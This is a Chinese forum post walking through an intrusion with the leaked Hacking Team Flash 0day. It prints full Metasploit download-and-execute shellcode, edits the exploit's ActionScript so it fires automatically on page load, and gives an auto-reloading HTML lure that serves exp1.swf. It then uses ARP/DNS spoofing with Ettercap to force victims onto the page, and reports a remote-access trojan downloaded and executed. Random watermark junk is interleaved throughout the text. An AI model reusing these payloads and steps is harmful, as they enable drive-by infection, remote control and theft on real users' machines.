|
# j+ C( r2 Q4 t9 g: S2 R, _- Q: |$ ?
三、flash 0day之手工代码修改制作下载者实例入侵演示 6 J, K @7 x j. D
: k. ]- o. C) s% f- S3 z
' d8 v& z% b. z% |/ t( b 利用到的工具:
Y* h) @; _+ x
1 |- H* @$ j. {; J! u( [0 p- b0 S" h2 A- f
Msf
7 n1 Z2 N- s' s: \ % Z* t7 ?0 ~% \$ C# x
5 ~ Q3 Q' V) l
Ettercap " O: |6 J' G* U
" I2 @5 o. s; p9 t1 _7 _2 G
1 Q! i# v1 t3 F Z, I Adobe Flash CS6 1 g) E3 f, C8 e" o
, Z5 D1 ^& N$ W2 G9 l2 M
7 Z7 G, L" X( S, W: j Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
4 K# }; G6 b5 K5 [/ s0 r3 Z9 x
8 z! A. v2 t: U- L& `' y7 V
* a: X1 T" G1 j; _" N9 s' N 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 0 p- f+ r0 a/ |1 X4 N- x3 U
1 X* \0 v2 p0 `7 K$ y ? J9 B7 ?
如图: % V( R) @# q+ }; U: B% E
. Z7 o0 I: @4 f. h; p* Y8 A9 |2 [% H9 }! W2 T$ `
0 \# {$ W8 S6 g
4 v) A g; b3 j2 w8 T$ [& t1 ~) n7 L; G
( i' H# ^& m4 p2 f ; ^3 B0 X' f1 Q2 u
( ~5 p: m- n& {5 O4 e( B3 a
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) t* r# E7 C1 {
; G" G! `7 e5 M, s M' R
4 J8 g/ W p. c + f6 n8 N q8 \2 {0 F
+ L% W* z E% A3 F7 p# R; Z
( g6 r/ o9 F. t% h6 b$ c  8 \1 D& [9 J- X* l; y8 x$ R0 f
" P) e: j5 F9 }6 Y
8 r6 Q" ~0 P9 v8 h2 V* ^: k 然后执行generate -t dword生成shellcode,如下: # D9 G. X' {. b% C" `: n( T. h0 R6 C
2 k; O+ w1 r, d
' v7 ` e& S/ l: _2 Q
9 t0 q4 r! u) ^: r 1 j9 T+ `0 A* A. [ X
* m1 h4 x$ g+ H; G; ?, ?* r
复制代码到文本下便于我们一会编辑flash exp,如下:
/ Q( X6 j5 V, B( n 4 H( h, W: h4 l" }% c
" x& |8 ]# A F: y
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 1 M) S6 ~. O6 n8 T3 b
4 F+ {& j7 w$ s0 @+ u) S. E, I
! }9 r/ h; S! j- E3 P, }9 v 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ( a1 r% X/ \6 A3 L( E+ L4 r, C- x
6 `6 j' D, U* V, {( l, {6 K( r' s$ ^
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + f) g6 K: }) S) o0 A
$ I {: J1 }- W3 j, h6 k
' Y( D0 M7 b( X" n7 p# d
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
3 g" @$ O2 }" |2 n; G& Y
: L: y5 l0 g2 j: N {2 X
}. X: I% @4 x+ k- I( g 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, & z }$ q% X. p3 E
2 F; C0 m" |/ c# c# U2 w0 L! ] E% }% \. |8 V* U+ ~+ G; u
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
+ m# u& P+ ^/ t3 E1 H7 j7 ^0 H / E1 m) S- J6 ]2 c* L: A" W7 }. s
. S/ V% K1 \# ~5 E3 T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! W! `8 V4 {5 |, d$ H7 J
) A7 O* j d* B1 R
; k" i- b k* O& d! A' M$ O( u 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! Y) ^1 S9 V1 v+ x . \1 L+ g. O& X; f9 ~- U
4 y$ [) G6 u+ o 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 G, ]/ j( \$ y) L8 ^3 p' B5 L& Y
9 V6 A0 @# ~/ k' ]
) ~2 |" U( e: [. G, J) t 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 3 O) U5 [- N$ T$ `
* s2 E% P$ ]9 W$ }
G9 X+ `. f, O9 z( k; e9 Z 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
. j1 i. \# J: I0 S& L' ~4 w! H
) H% Z/ Q+ l* b9 G( L& B" t/ V- U3 B: n$ o- ?7 M
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
( u; a, \( J) b5 M0 p* T w
8 G+ r s- H, N+ R' C5 K* x& W* a$ \4 Z& E5 y5 m5 @! o
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
* y/ U, p0 ]; k
9 f: S! q; g) M, Q) d R' H5 C( [4 H3 S |8 |1 _
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 4 N' W0 |! W8 c `, U8 v
3 ^" r) d( h- e$ l" [
1 ~! D) |" P* C ! h: s& ^( F6 \" x
O" A" X7 C' b) O4 ]- X1 {7 V
/ d! _$ ?2 L2 ]: R1 u ( I1 ~0 p# k% z5 Y
+ {% h" E* W) S* M( o6 Y
) G) G& S# f! z' P) \+ ^" K 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 e2 e2 L0 }: F1 r' ]
& }9 @/ a7 M; p- U' ~9 b4 s( D& s! r
- b" b5 u/ h1 T( ]9 o8 y
 7 P6 }% z. c: r- k8 P
; J$ b3 K& m: y/ r. m5 F5 X! v
先修改ShellWin32.as,部分源代码如图: & Q5 k: n2 C- b: V! T
( H" b, i2 ]$ } I
! {/ r9 n# T2 D! [
- ~, L6 h" w4 Z2 }% `1 z( K
t1 D" B' B6 _: |& |6 i: y" r* M3 D* ?! d7 G& v
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 U/ R5 Y1 ]# T5 r: `- Z
% A5 a. N+ m+ j" y; q0 X
! c- `# B( r5 K- q. h& m' k
' r: A! d6 x( C. j3 J* j
, }$ F$ M. [- b5 Y% h6 v+ W$ a( P, H7 q" |6 ^' H9 k j0 \( s
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 0 j: K4 w9 a1 @0 h2 S: k' i0 a% e0 S
, `% `0 ?! Q) N9 N
0 z0 q. \; P" a- S* y
( a7 T& O& `# k8 b & L5 d0 Z% W$ H( o
5 O9 v1 z: m) v
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
5 H2 @- D3 K j2 n8 I2 A9 @' M) g1 n
5 Z! n$ X ^1 P, w; k& f. }
. U, L0 s: @$ n ( t- r6 `$ u4 b- F8 U9 ?* X
' G, `0 d9 w% z6 w
9 N3 E& E3 a. j9 }! \+ V2 z9 @
5 ~# A7 U2 b, b) e, w- i% m . q. R* [; q2 G: Z
3 m5 l, x4 f# s# [4 ]  ) Y5 X8 X* o' T' K8 |8 H
! F. O1 y" H0 `
0 H( A7 q, F% ]* h' h. L ?& Z7 Z
然后点保存,下面我们来编译一下,打开
' S3 p" O$ k O/ F- I % g6 [/ G) |2 {4 U
# s, z' y; S. P+ F! c9 G! j
exp1.fla然后点文件-发布,看看编译没错误
/ s9 [% G& q( n' @: s ! g+ h' z9 A9 C- d G
& |' g' v3 R! e4 R
% e5 U+ b! W3 y/ L
$ h$ K6 b4 L2 Y9 r
4 c, Y5 I# T% P$ F
6 l, J8 i) m) B# e& e9 {8 K" K . Y% L+ _5 E7 r1 |) q6 y
, o5 O- E$ r0 m0 X: ?, t% {
8 `) B. G, l, h- r7 W' ^
% ]% X$ z0 A1 ^, P% m5 o8 r6 |5 j- O. G7 O! c
2 \: D' S+ L6 R7 P Y $ {% G6 C% l/ `$ s% u5 T4 b
* c0 B* H) D# a, h) h. D' A4 i0 c 然后我们把生成的 2 L1 q) w$ K% H7 H/ N V) j6 x
M3 Y* U" y$ U0 r- u* K/ J- P5 O
7 S9 E! N9 g- Y, S" H1 a exp1.swf丢到kailinux 的/var/www/html下: & c# ?8 A; L; V& I6 v; `; u3 d4 N% z
& w" X! D9 s9 E, L; l8 \; ^) Q1 J' l
然后把这段代码好好编辑一下
d1 M, h+ O, c; [& |, J0 H + A6 I7 z) E$ g3 d+ p4 A
1 m, G& {7 S# U" J! L& {. Z; P) v8 ^
$ L$ k. C) y: s) z
0 O {* f' P' G- ?/ K' j+ u* e `4 l# H5 y- K- I4 n5 F: P
. p t" @9 A: Z/ q8 K, z% k5 I7 @( g
9 j: J1 r; g; h* S+ {- f. S- F
s0 ^) z* r5 E5 w
1 A. k! s) A4 p' I2 u& i
6 \9 L9 P# i7 a+ w! O3 u
5 q0 D& M; X8 N- i; ^1 q1 N ! |3 h8 d( A5 w. Q, z! p
{1 r! b* g. O& b( R o
2 I1 { k& L$ O! r5 F
8 F6 ^( L4 W# v2 @* L 9 Y" `: f, r& l* V. ]0 b
; k6 f% P) U4 K. j' k / [! }; g# _- n" x2 ~& A4 _. W
4 v# Q$ O" u. G3 P/ ?" {: E1 ]7 p* U6 l; W3 t) N# N! e
<!DOCTYPE html>
- N8 M' ]' e3 A1 M- D7 s ! B _0 ?: U8 o' U6 _% R6 O. E5 Y
% d6 Q* u5 F0 ?6 M& B! E
<html> 0 W1 o* j3 Y0 A5 D f- M9 |
) i6 N- A- }( |) K6 d7 W
+ [+ j, E" B2 ^3 ` <head> 0 T2 s: i: y6 B/ d o F; S6 ?
( c C0 }1 a: m: u" n- g3 a {3 }" B1 Q' f# n1 ~; S0 g2 d- X
<meta http-equiv="Content-Type" content="text/html;
" d7 b4 P9 Y( A ' U) H- q% e/ Z
2 ^2 G( ]2 g+ {! {! s- d; r
charset=utf-8"/> * P' [8 q! g9 v
- X& |6 W" H3 ?9 L, C) @
# [3 s* i% _! }5 i3 _- h
</head>
y. |# G; r( G4 O+ |) i1 T& G1 f1 I V
7 H, v0 [* X) ^8 S0 v" m u1 A* E8 P9 K6 Q# ?+ v; a" T
<body>
a3 S$ {$ ]4 a( q$ I# B- @9 { 7 u) O; P: b) P/ k
: S5 ~) J: ]' c% ^ <h2> Please wait, the requested page is loading...</h2>
; v7 r+ N+ n3 R) N9 J & |( a) q; A. F: f8 O& C* m
( c: w/ }: ?' d- O5 v
<br>
% p, |8 ^9 {0 _5 H, S 6 m; r' n; m- W( q) c% J; r
( X7 \4 {* E h) K <OBJECT
, f7 d( z. n0 h7 Z, S+ j ' R" B# m# ^7 F& ~
6 \) J8 P. R+ Y7 \0 M8 ^! z
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie / |, Z f K8 X& k
( D# p: U' g$ f8 n0 o5 i. Z {; s! j: R2 w1 I5 g u4 _& T% W' x
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 R) z C! n& d5 H$ u& v- w 4 f* A- _5 g; L; x" i/ a
0 W- @2 N3 C+ N/ m4 U; f7 E7 t+ p, {
</body>
3 Y; m: y7 w0 d, @2 @/ c
" b9 {0 p A& R5 V: Z8 e
% [0 Q. ~8 _1 {. Z <script>
4 R# B$ ^& D% i+ }+ x; n% c% y% D% H , i: _' w* {1 v/ J. S" R6 c- J6 {
2 H+ s# k9 w( E" m: \" a8 T
setTimeout(function () {
: o+ x! X$ l2 I6 I" `; M
9 R2 |4 [/ `8 l/ V& t; j( Q0 q4 E. ^' G1 L8 d9 K/ j
' k; z* ~5 }5 W. W" l6 A2 y( s4 Y 5 }' h% A+ J& }0 u$ `
# M9 `/ b- ^# Q window.location.reload();
$ t5 R2 }$ U1 y
- g* {0 I- g; r- V4 |
4 f/ f6 ]. y- x4 W5 U! O# d- ? }, 10000); 6 r# {" G6 U5 G7 P
/ p7 a7 L$ w) l b4 I
) {6 v+ @" P2 e
j( ~! |" e n" _
9 o! s3 D; X: U1 ]
" i( j) f4 }5 D/ ]- @1 V5 m </script>
3 ^% j6 Q2 i1 N/ Y + l+ O8 W8 D( p* m; W. X3 L
$ S7 n% t( {+ S9 {9 O2 r6 J y
</html> : x1 H. z# l8 G
3 H# |# z2 t# G; |: y
8 t) u5 w8 E: W% C. w. Q 2 t/ b5 H# o. V4 t: ^- W
; e( H5 T) X! |6 K( y
. A& N/ J/ Q9 C0 s 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
3 C1 H" C, F; i; j 8 S- b3 U+ F& w7 S
7 R% v# k4 o) r! Q$ Q2 X 
( W# i+ `( d2 p3 Q# P& ^9 R( E " [& Z: N/ w0 _6 @7 c# [! H
0 M& M1 {' }0 f& u2 ]' P: D9 o1 r
8 ^+ |$ j: k+ r) R: u7 o& j+ y) E
% \8 ]5 B, M& C3 q
: B P+ }3 H! h! K- @- h6 z* K5 I
4 Z2 P" d9 E) }, \
; C# S* _: e9 e }. N) ~+ L. A _. p; A7 q: a
* g2 x3 O0 m" ]- x, ^( j" ]
- p* F; @: o& i% D8 B- E
C8 u7 D) M$ g! B' L7 L
4 m- `1 ^! a0 w6 g# J5 B
7 `0 f) n9 z1 w3 J
: F$ e' L: K6 n% R 下面我们用ettercap欺骗如图: / o" J. F* i! [1 a O* g. O9 ^
' {# p" X; X- f* L( A) e: c! l; C8 o/ s
" n: N& U" o2 z 2 a9 K! d+ l( r6 P0 @% }" n
4 Z' {9 j7 d* N* ~( k6 p$ q
& \ t5 ^) E% a, W % w% U3 n8 r6 L5 Y9 i& E- U' S7 ]) s
0 ?, j- v& V" I0 v& E: p' v' B
下面我们随便访问个网站看看: # t% B" [- H% ^: W
6 [' ^# _& y6 ^/ d9 g; a& o0 c
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: $ V3 c- A3 W W8 _; K8 n* ]
/ ^' I) Y& w: X# q1 p* P: X
6 T; s# b+ T9 K 
3 U# Q1 ?. _& b. v " r) x/ M' C) G: U7 ^
; H* @' m* l+ [. M! Z, a
我们看另一台,
1 s* W x! x' U$ O8 A. p
4 w& C$ H i, ~+ A0 ~ j
3 r2 ^1 }9 e& p% K; Z# B 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
- \& Q+ Z' c' K" M) x | 
发表于 2018-10-20 20:28:55
收藏
支持
反对